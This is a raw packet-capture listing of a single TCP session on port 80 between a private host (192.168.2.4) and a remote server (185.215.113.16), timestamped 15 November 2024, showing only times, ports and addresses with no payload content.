Nov 15, 2024 14:09:35.516539097 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.516566992 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.517046928 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517057896 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517066002 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517077923 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517086029 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517095089 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517095089 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.517103910 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517115116 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517115116 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.517124891 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517133951 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.517141104 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517149925 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.517153025 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517163992 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517173052 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.517173052 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517194986 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.517220974 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.517724991 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517735958 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517745972 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517755985 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517765999 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517776012 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517776966 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.517786980 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517791986 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.517800093 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517810106 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517817020 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.517821074 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517832041 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517834902 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.517843008 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517844915 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.517854929 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517868042 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.517874002 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.517898083 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.517911911 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.518544912 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.518557072 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.518565893 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.518574953 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.518584013 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.518594027 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.518600941 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.518604994 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.518615961 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.518625021 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.518630981 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.518635035 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.518645048 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.518650055 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.518656969 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.518666983 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.518672943 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.518677950 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.518685102 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.518690109 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.518716097 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.518740892 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.519386053 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.519397974 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.519407034 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.519417048 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.519426107 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.519440889 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.519471884 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.519526005 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.519535065 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.519558907 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.519565105 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.519570112 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.519591093 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.519613981 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.519762039 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.519803047 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.519841909 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.519855022 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.519865036 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.519876003 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.519882917 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.519886971 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.519903898 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.519928932 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.562160015 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.562172890 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.562181950 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.562227011 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.562257051 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.592499018 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.592509985 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.592518091 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.592598915 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.592608929 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.592617989 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.592634916 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.592688084 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.592732906 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.592889071 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.592897892 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.592907906 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.592917919 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.592926025 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.592940092 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.592956066 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.592974901 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.593095064 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.593139887 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.593247890 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.593291044 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.593370914 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.593385935 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.593415022 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.593427896 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.593439102 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.593466043 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.593476057 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.593503952 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.593528032 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.631447077 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.631495953 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.631506920 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.631516933 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.631553888 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.631597996 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.631634951 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.631701946 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.631712914 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.631724119 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.631735086 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.631745100 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.631762028 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.631792068 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.631822109 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.631861925 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.631902933 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.631915092 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.631925106 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.631937027 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.631944895 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.631947994 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.631967068 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.631984949 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.632155895 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632167101 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632177114 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632199049 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.632215977 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.632292986 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632302999 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632309914 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632318974 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632328033 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632339954 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.632369041 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.632446051 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632457018 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632467031 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632477999 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632497072 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.632520914 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.632689953 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632700920 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632709980 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632720947 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632730961 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632731915 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.632744074 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.632761955 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.632790089 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633166075 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633177042 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633187056 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633197069 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633207083 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633213997 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633218050 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633229971 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633235931 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633254051 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633269072 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633447886 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633491039 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633491039 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633502960 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633512974 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633523941 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633526087 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633534908 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633544922 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633547068 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633553982 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633582115 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633722067 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633732080 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633740902 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633750916 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633760929 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633768082 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633790970 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633816957 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633848906 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633858919 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633867979 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633879900 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633889914 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633893967 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633902073 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.633920908 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633930922 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.633959055 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.634136915 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634147882 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634161949 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634172916 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634182930 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634183884 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.634192944 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634207964 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.634217978 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.634222984 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634236097 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634244919 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634248018 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.634258032 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634259939 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.634269953 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634282112 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634288073 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.634291887 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634310007 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.634325981 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.634663105 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634675026 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634685040 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634695053 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634704113 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634712934 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.634731054 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.634746075 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.634970903 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634982109 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.634991884 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635001898 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635011911 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635021925 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.635023117 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635035992 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635044098 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.635044098 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635054111 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635062933 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.635066986 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635077000 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635082006 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.635106087 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.635127068 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.635363102 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635374069 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635382891 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635392904 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635402918 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635412931 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635415077 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.635423899 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.635442019 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.635457039 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.636346102 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.636394024 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.636404037 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.636415958 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.636450052 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.636466026 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.636545897 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.636558056 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.636568069 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.636579037 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.636601925 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.636626005 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.636763096 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.636775017 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.636785030 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.636795044 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.636806965 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.636814117 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.636830091 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.636853933 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.679316044 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.679486036 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.679496050 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.679505110 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.679594040 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.709654093 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.709666967 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.709680080 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.709762096 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.709764004 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.709774971 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.709789038 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.709800005 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.709817886 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.709861994 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.709892988 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.709923983 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.709940910 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.709969044 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.709980011 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.709990978 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.710000038 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.710030079 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.710053921 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.710125923 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.710138083 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.710187912 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.710808992 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.710820913 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.710870981 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.711939096 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.711951017 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.711961985 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.712006092 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.748884916 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.748895884 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.748905897 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.748951912 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.748960972 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.748972893 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.748977900 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.748982906 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.748995066 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749026060 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.749047041 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.749176025 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749186993 CET	80	49761	185.215.113.16	192.168.2.4
